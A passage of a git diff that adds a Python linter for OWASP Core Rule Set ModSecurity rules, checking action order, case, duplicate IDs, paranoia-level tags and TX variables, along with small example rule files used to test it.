0000000000..63f6c9fec6 --- /dev/null 
+++ b/util/crs-rules-check/examples/test6.conf @@ -0,0 +1,7 @@ +SecRule ARGS "@rx attack" \ + "id:1,\ + phase:4,\ + block,\ + capture,\ + t:none,\ + ctl:auditLogParts=+E" diff --git a/util/crs-rules-check/examples/test7.conf b/util/crs-rules-check/examples/test7.conf new file mode 100644 index 0000000000..405301364c --- /dev/null +++ b/util/crs-rules-check/examples/test7.conf @@ -0,0 +1,14 @@ + +SecRule ARGS "@rx foo" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" + +SecRule ARGS_NAMES "@rx bar" \ + "id:1001,\ + phase:2,\ + block,\ + capture,\ + t:none" diff --git a/util/crs-rules-check/examples/test8.conf b/util/crs-rules-check/examples/test8.conf new file mode 100644 index 0000000000..bd54046b69 --- /dev/null +++ b/util/crs-rules-check/examples/test8.conf 
@@ -0,0 +1,56 @@ + +SecRule &TX:blocking_paranoia_level "@eq 0" \ + "id:901120,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.blocking_paranoia_level=1'" + +SecRule &TX:detection_paranoia_level "@eq 0" \ + "id:901125,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.detection_paranoia_level=%{TX.blocking_paranoia_level}'" + +SecRule &TX:error_anomaly_score "@eq 0" \ + "id:901141,\ + phase:1,\ + pass,\ + nolog,\ + ver:'OWASP_CRS/4.0.0-rc1',\ + setvar:'tx.error_anomaly_score=4'" + +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920011,phase:1,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" +SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:920012,phase:2,pass,nolog,skipAfter:END-REQUEST-920-PROTOCOL-ENFORCEMENT" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920160,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/2',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920161,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + +SecRule REQUEST_HEADERS:Content-Length "!@rx ^\d+$" \ + "id:920162,\ + phase:1,\ + block,\ + t:none,\ + tag:'paranoia-level/1',\ + severity:'CRITICAL',\ + setvar:'tx.inbound_anomaly_score_pl2=+%{tx.critical_anomaly_score}'" + + +SecMarker "END-REQUEST-920-PROTOCOL-ENFORCEMENT" diff --git a/util/crs-rules-check/examples/test9.conf b/util/crs-rules-check/examples/test9.conf new file mode 100644 index 0000000000..d81d69fa51 --- /dev/null +++ b/util/crs-rules-check/examples/test9.conf @@ -0,0 +1,13 @@ + +SecRule TX:foo "@rx bar" \ + "id:1001,\ + phase:1,\ + pass,\ + nolog" + +SecRule ARGS "@rx ^.*$" \ + "id:1002,\ + phase:1,\ + pass,\ + nolog,\ + setvar:tx.bar=1" 
diff --git a/util/crs-rules-check/requirements.txt b/util/crs-rules-check/requirements.txt
new file mode 100644
index 0000000000..a989487670
--- /dev/null
+++ b/util/crs-rules-check/requirements.txt
@@ -0,0 +1 @@
+msc-pyparser>=1.2.1
diff --git a/util/crs-rules-check/rules-check.py b/util/crs-rules-check/rules-check.py
new file mode 100755
index 0000000000..1a9f842fcb
--- /dev/null
+++ b/util/crs-rules-check/rules-check.py
@@ -0,0 +1,945 @@ +#!/usr/bin/env python3 + +import sys +import os +import glob +import msc_pyparser +import difflib +import argparse +import re + +oformat = "native" + +class Check(object): + def __init__(self, data, txvars): + + # txvars is a global used hash table, but processing of rules is a sequential flow + # all rules need this global table + self.globtxvars = txvars + # list available operators, actions, transformations and ctl args + self.operators = "beginsWith|containsWord|contains|detectSQLi|detectXSS|endsWith|eq|fuzzyHash|geoLookup|ge|gsbLookup|gt|inspectFile|ipMatch|ipMatchF|ipMatchFromFile|le|lt|noMatch|pmFromFile|pmf|pm|rbl|rsub|rx|streq|strmatch|unconditionalMatch|validateByteRange|validateDTD|validateHash|validateSchema|validateUrlEncoding|validateUtf8Encoding|verifyCC|verifyCPF|verifySSN|within".split("|") + self.operatorsl = [o.lower() for o in self.operators] + self.actions = "accuracy|allow|append|auditlog|block|capture|chain|ctl|deny|deprecatevar|drop|exec|expirevar|id|initcol|logdata|log|maturity|msg|multiMatch|noauditlog|nolog|pass|pause|phase|prepend|proxy|redirect|rev|sanitiseArg|sanitiseMatched|sanitiseMatchedBytes|sanitiseRequestHeader|sanitiseResponseHeader|setenv|setrsc|setsid|setuid|setvar|severity|skipAfter|skip|status|tag|t|ver|xmlns".split("|") + self.actionsl = [a.lower() for a in self.actions] + self.transforms = "base64DecodeExt|base64Decode|base64Encode|cmdLine|compressWhitespace|cssDecode|escapeSeqDecode|hexDecode|hexEncode|htmlEntityDecode|jsDecode|length|lowercase|md5|none|normalisePathWin|normalisePath|normalizePathWin|normalizePath|parityEven7bit|parityOdd7bit|parityZero7bit|removeCommentsChar|removeComments|removeNulls|removeWhitespace|replaceComments|replaceNulls|sha1|sqlHexDecode|trimLeft|trimRight|trim|uppercase|urlDecodeUni|urlDecode|urlEncode|utf8toUnicode".split("|") + self.transformsl = [t.lower() for t in self.transforms] + self.ctls = 
"auditEngine|auditLogParts|debugLogLevel|forceRequestBodyVariable|hashEnforcement|hashEngine|requestBodyAccess|requestBodyLimit|requestBodyProcessor|responseBodyAccess|responseBodyLimit|ruleEngine|ruleRemoveById|ruleRemoveByMsg|ruleRemoveByTag|ruleRemoveTargetById|ruleRemoveTargetByMsg|ruleRemoveTargetByTag".split("|") + self.ctlsl = [c.lower() for c in self.ctls] + + # list the actions in expected order + # see wiki: https://github.com/SpiderLabs/owasp-modsecurity-crs/wiki/Order-of-ModSecurity-Actions-in-CRS-rules + # note, that these tokens are with lovercase here, but used only for to check the order + self.ordered_actions = [ + "id", # 0 + "phase", # 1 + "allow", + "block", + "deny", + "drop", + "pass", + "proxy", + "redirect", + "status", + "capture", # 10 + "t", + "log", + "nolog", + "auditlog", + "noauditlog", + "msg", + "logdata", + "tag", + "sanitisearg", + "sanitiserequestheader", # 20 + "sanitisematched", + "sanitisematchedbytes", + "ctl", + "ver", + "severity", + "multimatch", + "initcol", + "setenv", + "setvar", + "expirevar", # 30 + "chain", + "skip", + "skipafter", + ] + + self.data = data # holds the parsed data + self.current_ruleid = 0 # holds the rule id + self.curr_lineno = 0 # current line number + self.chained = False # holds the chained flag + self.caseerror = [] # list of case mismatch errors + self.orderacts = [] # list of ordered action errors + self.auditlogparts = [] # list of wrong ctl:auditLogParts + self.undef_txvars = [] # list of undefined TX variables + self.pltags = [] # list of incosistent PL tags + self.plscores = [] # list of incosistent PL scores + self.dupes = [] # list of duplicated id's + self.ids = {} # list of rule id's + self.newtags = [] # list of new, unlisted tags + + self.re_tx_var = re.compile("%\{\}") + + def store_error(self, msg): + # store the error msg in the list + self.caseerror.append({ + 'ruleid' : 0, + 'line' : self.curr_lineno, + 'endLine': self.curr_lineno, + 'message': msg + }) + + def 
check_ignore_case(self): + # check the ignore cases at operators, actions, + # transformations and ctl arguments + for d in self.data: + if "actions" in d: + aidx = 0 # index of action in list + if self.chained == False: + self.current_ruleid = 0 + else: + self.chained = False + + while aidx < len(d['actions']): + a = d['actions'][aidx] # 'a' is the action from the list + + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + if a['act_name'] == "chain": + self.chained = True + + # check the action is valid + if a['act_name'].lower() not in self.actionsl: + self.store_error("Invalid action", a['act_name']) + # check the action case sensitive format + if self.actions[self.actionsl.index(a['act_name'].lower())] != a['act_name']: + self.store_error("Action case mismatch: %s" % a['act_name']) + + if a['act_name'] == 'ctl': + # check the ctl argument is valid + if a['act_arg'].lower() not in self.ctlsl: + self.store_error("Invalid ctl", a['act_arg']) + # check the ctl argument case sensitive format + if self.ctls[self.ctlsl.index(a['act_arg'].lower())] != a['act_arg']: + self.store_error("Ctl case mismatch: %s" % a['act_arg']) + if a['act_name'] == 't': + # check the transform is valid + if a['act_arg'].lower() not in self.transformsl: + self.store_error("Invalid transform: %s" % a['act_arg']) + # check the transform case sensitive format + if self.transforms[self.transformsl.index(a['act_arg'].lower())] != a['act_arg']: + self.store_error("Transform case mismatch : %s" % a['act_arg']) + aidx += 1 + if "operator" in d and d["operator"] != "": + self.curr_lineno = d['oplineno'] + # strip the operator + op = d['operator'].replace("!", "").replace("@", "") + # check the operator is valid + if op.lower() not in self.operatorsl: + self.store_error("Invalid operator: %s" % d['operator']) + # check the operator case sensitive format + if self.operators[self.operatorsl.index(op.lower())] != op: + self.store_error("Operator 
case mismatch: %s" % d['operator']) + else: + if d['type'].lower() == "secrule": + self.curr_lineno = d['lineno'] + self.store_error("Empty operator isn't allowed") + if self.current_ruleid > 0: + for e in self.caseerror: + e['ruleid'] = self.current_ruleid + e['message'] += " (rule: %d)" % (self.current_ruleid) + + def check_action_order(self): + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + max_order = 0 # maximum position of read actions + if self.chained == False: + self.current_ruleid = 0 + else: + self.chained = False + + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + + # get the 'id' of rule + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + # check if chained + if a['act_name'] == "chain": + self.chained = True + + # get the index of action from the ordered list + # above from constructor + try: + act_idx = self.ordered_actions.index(a['act_name'].lower()) + except ValueError: + print("ERROR: '%s' not in actions list!" 
% (a['act_name'])) + sys.exit(-1) + + # if the index of current action is @ge than the previous + # max value, load it into max_order + if act_idx >= max_order: + max_order = act_idx + else: + # prevact is the previous action's position in list + # act_idx is the current action's position in list + # if the prev is @gt actually, means it's at wrong position + if self.ordered_actions.index(prevact) > act_idx: + self.orderacts.append({ + 'ruleid' : 0, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "action '%s' at pos %d is wrong place against '%s' at pos %d" % (prevact, pidx, a['act_name'], aidx,) + }) + prevact = a['act_name'].lower() + pidx = aidx + aidx += 1 + for a in self.orderacts: + if a['ruleid'] == 0: + a['ruleid'] = self.current_ruleid + a['message'] += " (rule: %d)" % (self.current_ruleid) + + def check_ctl_audit_log(self): + """check there is no ctl:auditLogParts action in any rules""" + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + + # get the 'id' of rule + self.curr_lineno = a['lineno'] + if a['act_name'] == "id": + self.current_ruleid = int(a['act_arg']) + + # check if action is ctl:auditLogParts + if a['act_name'].lower() == "ctl" and a['act_arg'].lower() == "auditlogparts": + self.auditlogparts.append({ + 'ruleid' : self.current_ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "" + }) + + aidx += 1 + + def collect_tx_variable(self, fname): + """collect TX variables in rules + this function collects the TX variables at rules, + if the variable is at a 'setvar' action's left side, eg + setvar:tx.foo=bar + + Because this rule called before any other check, + additionally it checks the duplicated rule ID + """ + chained = False + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + if chained == False: + ruleid = 0 # ruleid + phase = 2 # works 
only in Apache, libmodsecurity uses default phase 1 + else: + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if ruleid in self.ids: + self.dupes.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "id %d is duplicated, previous place: %s:%d" % (ruleid, self.ids[ruleid]['fname'], self.ids[ruleid]['lineno']) + }) + else: + self.ids[ruleid] = {'fname': fname, 'lineno': a['lineno']} + if a['act_name'] == "phase": + phase = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] == "setvar": + if a['act_arg'][0:2].lower() == "tx": + txv = a['act_arg'][3:].split("=") + txv[0] = txv[0].lower() + # set TX variable if there is no such key + # OR + # key exists but the existing struct's phase is higher + if (txv[0] not in self.globtxvars or self.globtxvars[txv[0]]['phase'] > phase) and \ + not re.search("%\{[^%]+\}", txv[0]): + self.globtxvars[txv[0]] = { + 'phase' : phase, + 'used' : False, + 'file' : fname, + 'ruleid' : ruleid, + 'message': "", + 'line' : a['lineno'], + 'endLine': a['lineno'] + } + else: + pass + aidx += 1 + + def check_tx_variable(self, fname): + """this function checks if a used TX variable has set + + a variable is used when: + * it's an operator argument: "@rx %{TX.foo}" + * it's a target: SecRule TX.foo "@..." 
+ * it's a right side value in a value giving: setvar:tx.bar=tx.foo + + this function collects the variables if it is used but not set previously + """ + check_exists = None # set if rule checks the existence of varm eg `&TX:foo "@eq 1"` + has_disruptive = False # set if rule contains disruptive action + chained = False + for d in self.data: + if d['type'].lower() in ["secrule", "secaction"]: + aidx = 0 # stores the index of current action + if chained == False: + phase = 2 # works only in Apache, libmodsecurity uses default phase 1 + ruleid = 0 + else: + chained = False + + # iterate over actions and collect these values: + # ruleid, phase, chained, rule has or not any disruptive action + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "phase": + phase = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] in ['block', 'deny', 'drop', 'allow', 'proxy', 'redirect']: + has_disruptive = True + + # check wheter tx.var is used at setvar's right side + val_act = [] + val_act_arg = [] + # example: + # setvar:'tx.inbound_anomaly_score_threshold=5' + # + # act_arg <- tx.inbound_anomaly_score_threshold + # act_atg_val <- 5 + # + # example2 (same as above, but no single quotes!): + # setvar:tx.inbound_anomaly_score_threshold=5 + # act_arg <- tx.inbound_anomaly_score_threshold + # act_atg_val <- 5 + # + if "act_arg" in a and a['act_arg'] is not None: + val_act = re.findall("%\{(tx.[^%]*)\}", a['act_arg'], re.I) + if "act_arg_val" in a and a['act_arg_val'] is not None: + val_act_arg = re.findall("%\{(tx.[^%]*)\}", a['act_arg_val'], re.I) + for v in val_act + val_act_arg: + v = v.lower().replace("tx.", "") + # check whether the variable is a captured var, eg TX.1 - we do not care that case + if not re.match("^\d$", v, re.I): + # v holds the tx.ANY variable, but not the captured ones + # we should collect these variables + if (v not 
in self.globtxvars or phase < self.globtxvars[v]['phase']): + self.undef_txvars.append({ + 'var' : v, + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "TX variable '%s' not set / later set (rvar) in rule %d" % (v, ruleid) + }) + else: + self.globtxvars[v]['used'] = True + else: + if v in self.globtxvars: + self.globtxvars[v]['used'] = True + aidx += 1 + + if "operator_argument" in d: + oparg = re.findall("%\{(tx.[^%]*)\}", d['operator_argument'], re.I) + if oparg: + for o in oparg: + o = o.lower() + o = re.sub("tx\.", "", o, re.I) + if (o not in self.globtxvars or phase < self.globtxvars[o]['phase']) and \ + not re.match("^\d$", o) and \ + not re.match("\/.*\/", o) and \ + check_exists is None: + self.undef_txvars.append({ + 'var' : o, + 'ruleid' : ruleid, + 'line' : d['lineno'], + 'endLine': d['lineno'], + 'message': "TX variable '%s' not set / later set (OPARG) in rule %d" % (o, ruleid) + }) + elif o in self.globtxvars and phase >= self.globtxvars[o]['phase'] and \ + not re.match("^\d$", o) and \ + not re.match("\/.*\/", o): + self.globtxvars[o]['used'] = True + if "variables" in d: + for v in d['variables']: + # check if the variable is TX and has not a & prefix, which counts + # the variable length + if v['variable'].lower() == "tx": + if v['counter'] != True: + # * if the variable part (after '.' 
or ':') is not there in + # the list of collected TX variables, and + # * not a numeric, eg TX:2, and + # * not a regular expression, between '/' chars, eg TX:/^foo/ + # OR + # * rule's phase lower than declaration's phase + rvar = v['variable_part'].lower() + if (rvar not in self.globtxvars or (ruleid != self.globtxvars[rvar]['ruleid'] and phase < self.globtxvars[rvar]['phase'])) and \ + not re.match("^\d$", rvar) and \ + not re.match("\/.*\/", rvar): + self.undef_txvars.append({ + 'var' : rvar, + 'ruleid' : ruleid, + 'line' : d['lineno'], + 'endLine': d['lineno'], + 'message': "TX variable '%s' not set / later set (VAR)" % (v['variable_part']) + }) + elif rvar in self.globtxvars and phase >= self.globtxvars[rvar]['phase'] and \ + not re.match("^\d$", rvar) and \ + not re.match("\/.*\/", rvar): + self.globtxvars[rvar]['used'] = True + else: + check_exists = True + self.globtxvars[v['variable_part'].lower()] = { + 'var' : v['variable_part'].lower(), + 'phase' : phase, + 'used' : False, + 'file' : fname, + 'ruleid' : ruleid, + 'message': "", + 'line' : d['lineno'], + 'endLine': d['lineno'] + } + if has_disruptive == True: + self.globtxvars[v['variable_part'].lower()]['used'] = True + if len(self.undef_txvars) > 0 and self.undef_txvars[-1]['var'] == v['variable_part'].lower(): + del(self.undef_txvars[-1]) + if chained == False: + check_exists = None + has_disruptive = False + + def check_pl_consistency(self): + """this method checks the PL consistency + + the function iterates through the rules, and catches the set PL, eg: + + SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" ... 
+ this means we are on PL1 currently + + all rules must consist with current PL at the used tags and variables + + eg: + tag:'paranoia-level/1' + ^ + setvar:'tx.outbound_anomaly_score_pl1=+%{tx.error_anomaly_score}'" + ^^^ + additional relations: + * all rules must have the "tag:'paranoia-level/N'" if it does not have "nolog" action + * if rule have "nolog" action it must not have "tag:'paranoia-level/N'" action + * anomaly scoring value on current PL must increment by value corresponding to severity + + """ + curr_pl = 0 + tags = [] # collect tags + _txvars = {} # collect setvars and values + _txvlines = {} # collect setvars and its lines + severity = None # severity + has_nolog = False # nolog action exists + + for d in self.data: + # find the current PL + if d['type'].lower() in ["secrule"]: + for v in d['variables']: + if v['variable'].lower() == "tx" and \ + v['variable_part'].lower() == "detection_paranoia_level" and \ + d['operator'] == "@lt" and re.match("^\d$", d['operator_argument']): + curr_pl = int(d['operator_argument']) + + if "actions" in d: + aidx = 0 # stores the index of current action + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "severity": + severity = a['act_arg'].replace("'", "").lower() + if a['act_name'] == "tag": + tags.append(a) + if a['act_name'] == "setvar": + if a['act_arg'][0:2].lower() == "tx": + # this hack necessary, because sometimes we use setvar argument + # between '', sometimes not + # eg + # setvar:crs_setup_version=334 + # setvar:'tx.inbound_anomaly_score_threshold=5' + txv = a['act_arg'][3:].split("=") + txv[0] = txv[0].lower() # variable name + if len(txv) > 1: + txv[1] = txv[1].lower().strip("+\{\}") # variable value + else: + txv.append(a['act_arg_val'].strip("+\{\}")) + _txvars[txv[0]] = txv[1] + _txvlines[txv[0]] = a['lineno'] + if a['act_name'] == "nolog": + has_nolog = True + if 
a['act_name'] == "chain": + chained = True + aidx += 1 + + has_pl_tag = False + for a in tags: + if a['act_arg'][0:14] == "paranoia-level": + has_pl_tag = True + pltag = int(a['act_arg'].split("/")[1]) + if has_nolog: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "tag '%s' with 'nolog' action, rule id: %d" % (a['act_arg'], ruleid) + }) + elif pltag != curr_pl and curr_pl > 0: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "tag '%s' on PL %d, rule id: %d" % (a['act_arg'], curr_pl, ruleid) + }) + + if has_pl_tag != True and has_nolog == False and curr_pl >= 1: + self.pltags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "rule does not have `paranoia-level/%d` action, rule id: %d" % (curr_pl, ruleid) + }) + + for t in _txvars: + subst_val = re.search("%{tx.[a-z]+_anomaly_score}", _txvars[t], re.I) + val = re.sub("[\+\%\{\}]", "", _txvars[t]).lower() + scorepl = re.search("anomaly_score_pl\d$", t) # check if last char is a numeric, eg ...anomaly_score_pl1 + if scorepl: + if curr_pl > 0 and int(t[-1]) != curr_pl: + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "variable %s on PL %d, rule id: %d" % (t, curr_pl, ruleid) + }) + if severity is None and subst_val: # - do we need this? 
+ self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "missing severity action, rule id: %d" % (ruleid) + }) + else: + if val != 'tx.%s_anomaly_score' % (severity) and val != "0": + self.plscores.append({ + 'ruleid' : ruleid, + 'line' : _txvlines[t], + 'endLine': _txvlines[t], + 'message': "invalid value for anomaly_score_pl%d: %s with severity %s, rule id: %d" % (int(t[-1]), val, severity, ruleid) + }) + # variable has found so we need to mark it as used + self.globtxvars[t]['used'] = True + + # reset local variables if we are done with a rule <==> no more 'chain' action + if chained == False: + tags = [] # collect tags + _txvars = {} # collect setvars and values + _txvlines = {} # collect setvars and its lines + severity = None # severity + has_nolog = False # rule has nolog action + + def check_tags(self, fname, tagslist): + """ + check that only tags from the util/APPROVED_TAGS file are used + """ + chained = False + ruleid = 0 + for d in self.data: + if "actions" in d: + aidx = 0 # stores the index of current action + if chained == False: + ruleid = 0 + else: + chained = False + while aidx < len(d['actions']): + # read the action into 'a' + a = d['actions'][aidx] + if a['act_name'] == "id": + ruleid = int(a['act_arg']) + if a['act_name'] == "chain": + chained = True + if a['act_name'] == "tag": + # check wheter tag is in tagslist + if tagslist.count(a['act_arg']) == 0: + self.newtags.append({ + 'ruleid' : ruleid, + 'line' : a['lineno'], + 'endLine': a['lineno'], + 'message': "rule uses unknown tag: '%s'; only tags registered in the util/APPROVED_TAGS file may be used; rule id: %d" % (a['act_arg'], ruleid) + }) + aidx += 1 + + +def remove_comments(data): + """ + In some special cases, remove the comments from the beginning of the lines. + + A special case starts when the line has a "SecRule" or "SecAction" token at + the beginning and ends when the line - with or without a comment - is empty. 
+ + Eg.: + 175 # Uncomment this rule to change the default: + 176 # + 177 #SecAction \ + 178 # "id:900000,\ + 179 # phase:1,\ + 180 # pass,\ + 181 # t:none,\ + 182 # nolog,\ + 183 # setvar:tx.blocking_paranoia_level=1" + 184 + 185 + 186 # It is possible to execute rules from a higher paranoia level but not include + + In this case, the comments from the beginning of lines 177 and 183 are deleted and + evaluated as follows: + + 175 # Uncomment this rule to change the default: + 176 # + 177 SecAction \ + 178 "id:900000,\ + 179 phase:1,\ + 180 pass,\ + 181 t:none,\ + 182 nolog,\ + 183 setvar:tx.blocking_paranoia_level=1" + 184 + 185 + 186 # It is possible to execute rules from a higher paranoia level but not include + + """ + _data = [] # new structure by lines + lines = data.split("\n") + marks = re.compile("^#(| *)(SecRule|SecAction)", re.I) # regex what catches the rules + state = 0 # hold the state of the parser + for l in lines: + # if the line starts with #SecRule, #SecAction, # SecRule, # SecAction, set the marker + if marks.match(l): + state = 1 + # if the marker is set and the line is empty or contains only a comment, unset it + if state == 1 and l.strip() in ["", "#"]: + state = 0 + + # if marker is set, remove the comment + if state == 1: + _data.append(re.sub("^#", "", l)) + else: + _data.append(l) + + data = "\n".join(_data) + + return data + +def errmsg(msg): + if oformat == "github": + print("::error %s" % (msg)) + else: + print(msg) + +def errmsgf(msg): + if oformat == "github": + if 'message' in msg and msg['message'].strip() != "": + print("::error%sfile={file},line={line},endLine={endLine},title={title}: {message}".format(**msg) % (msg['indent']*" ")) + else: + print("::error%sfile={file},line={line},endLine={endLine},title={title}".format(**msg) % (msg['indent']*" ")) + else: + if 'message' in msg and msg['message'].strip() != "": + print("%sfile={file}, line={line}, endLine={endLine}, title={title}: {message}".format(**msg) % (msg['indent']*" ")) 
+ else: + print("%sfile={file}, line={line}, endLine={endLine}, title={title}".format(**msg) % (msg['indent']*" ")) + +def msg(msg): + if oformat == "github": + print("::debug %s" % (msg)) + else: + print(msg) + +if __name__ == "__main__": + parser = argparse.ArgumentParser(description="CRS Rules Check tool") + parser.add_argument("-o", "--output", dest="output", help="Output format native[default]|github", required=False) + parser.add_argument("-r", "--rules", metavar='/path/to/coreruleset/*.conf', type=str, + nargs='*', help='Directory path to CRS rules', required=True, + action="append") + parser.add_argument("-t", "--tags-list", dest="tagslist", help="Path to file with permitted tags", required=True) + args = parser.parse_args() + + crspath = [] + for l in args.rules: + crspath += l + + if args.output is not None: + if args.output not in ["native", "github"]: + print("--output can be one of the 'native' or 'github'. Default value is 'native'") + sys.exit(1) + oformat = args.output + + tags = [] + try: + with open(args.tagslist, "r") as fp: + tags = [l.strip() for l in fp.readlines()] + # remove empty items, if any + tags = list(filter(lambda x: len(x) > 0, tags)) + except: + errmsg("Can't open tags list: %s" % args.tagslist) + sys.exit(1) + + retval = 0 + try: + flist = crspath + flist.sort() + except: + errmsg("Can't open files in given path!") + sys.exit(1) + + if len(flist) == 0: + errmsg("List of files is empty!") + sys.exit(1) + + parsed_structs = {} + txvars = {} + + for f in flist: + try: + with open(f, 'r') as inputfile: + data = inputfile.read() + # modify the content of the file, if it is the "crs-setup.conf.example" + if f.startswith("crs-setup.conf.example"): + data = remove_comments(data) + except: + errmsg("Can't open file: %s" % f) + sys.exit(1) + + ### check file syntax + msg("Config file: %s" % (f)) + try: + mparser = msc_pyparser.MSCParser() + mparser.parser.parse(data) + msg(" Parsing ok.") + parsed_structs[f] = mparser.configlines + except 
Exception as e: + err = e.args[1] + if err['cause'] == "lexer": + cause = "Lexer" + else: + cause = "Parser" + errmsg("Can't parse config file: %s" % (f)) + errmsgf({ + 'indent' : 2, + 'file' : f, + 'title' : "%s error" % (cause), + 'line' : err['line'], + 'endLine': err['line'], + 'message': "can't parse file"}) + retval = 1 + continue + + msg("Checking parsed rules...") + for f in parsed_structs.keys(): + + msg(f) + c = Check(parsed_structs[f], txvars) + + ### check case usings + c.check_ignore_case() + if len(c.caseerror) == 0: + msg(" Ignore case check ok.") + else: + errmsg(" Ignore case check found error(s)") + for a in c.caseerror: + a['indent'] = 2 + a['file'] = f + a['title'] = "Case check" + errmsgf(a) + retval = 1 + + ### check action's order + c.check_action_order() + if len(c.orderacts) == 0: + msg(" Action order check ok.") + else: + errmsg(" Action order check found error(s)") + for a in c.orderacts: + a['indent'] = 2 + a['file'] = f + a['title'] = 'Action order check' + errmsgf(a) + retval = 1 + + ### make a diff to check the indentations + try: + with open(f, 'r') as fp: + fromlines = fp.readlines() + if f.startswith("crs-setup.conf.example"): + fromlines = remove_comments("".join(fromlines)).split("\n") + fromlines = [l + "\n" for l in fromlines] + except: + errmsg(" Can't open file for indent check: %s" % (f)) + retval = 1 + # virtual output + mwriter = msc_pyparser.MSCWriter(parsed_structs[f]) + mwriter.generate() + #mwriter.output.append("") + output = [] + for l in mwriter.output: + if l == "\n": + output.append("\n") + else: + output += [l + "\n" for l in l.split("\n")] + + if len(fromlines) < len(output): + fromlines.append("\n") + elif len(fromlines) > len(output): + output.append("\n") + + diff = difflib.unified_diff(fromlines, output) + if fromlines == output: + msg(" Indentation check ok.") + else: + errmsg(" Indentation check found error(s)") + retval = 1 + for d in diff: + d = d.strip("\n") + r = re.match("^@@ -(\d+),(\d+) \+\d+,\d+ 
@@$", d) + if r: + line1, line2 = [int(i) for i in r.groups()] + e = { + 'indent' : 2, + 'file' : f, + 'title' : "Indentation error", + 'line' : line1, + 'endLine': line1+line2, + 'message': "an indentation error has found" + } + errmsgf(e) + errmsg(d.strip("\n")) + + ### check `ctl:auditLogParts=+E` right place in chained rules + c.check_ctl_audit_log() + if len(c.auditlogparts) == 0: + msg(" no 'ctl:auditLogParts' action found.") + else: + errmsg(" Found 'ctl:auditLogParts' action") + for a in c.auditlogparts: + a['indent'] = 2 + a['file'] = f + a['title'] = "'ctl:auditLogParts' isn't allowed in CRS" + errmsgf(a) + retval = 1 + + ### collect TX variables + # this method collects the TX variables, which set via a + # `setvar` action anywhere + # this method does not check any mandatory clause + c.collect_tx_variable(f) + + ### check duplicate ID's + # c.dupes filled during the tx variable collected + if len(c.dupes) == 0: + msg(" no duplicate id's") + else: + errmsg(" Found duplicated id('s)") + for a in c.dupes: + a['indent'] = 2 + a['file'] = f + a['title'] = "'id' is duplicated" + errmsgf(a) + retval = 1 + + ### check PL consistency + c.check_pl_consistency() + if len(c.pltags) == 0: + msg(" paranoia-level tags are correct.") + else: + errmsg(" Found incorrect paranoia-level/N tag(s)") + for a in c.pltags: + a['indent'] = 2 + a['file'] = f + a['title'] = "wrong or missing paranoia-level/N tag" + errmsgf(a) + retval = 1 + if len(c.plscores) == 0: + msg(" PL anomaly_scores are correct.") + else: + errmsg(" Found incorrect (inbound|outbout)_anomaly_score value(s)") + for a in c.plscores: + a['indent'] = 2 + a['file'] = f + a['title'] = "wrong (inbound|outbout)_anomaly_score variable or value" + errmsgf(a) + retval = 1 + + ### check existence of used TX variables + c.check_tx_variable(f) + if len(c.undef_txvars) == 0: + msg(" All TX variables are set.") + else: + errmsg(" There are one or more unset TX variables.") + for a in c.undef_txvars: + a['indent'] = 2 + 
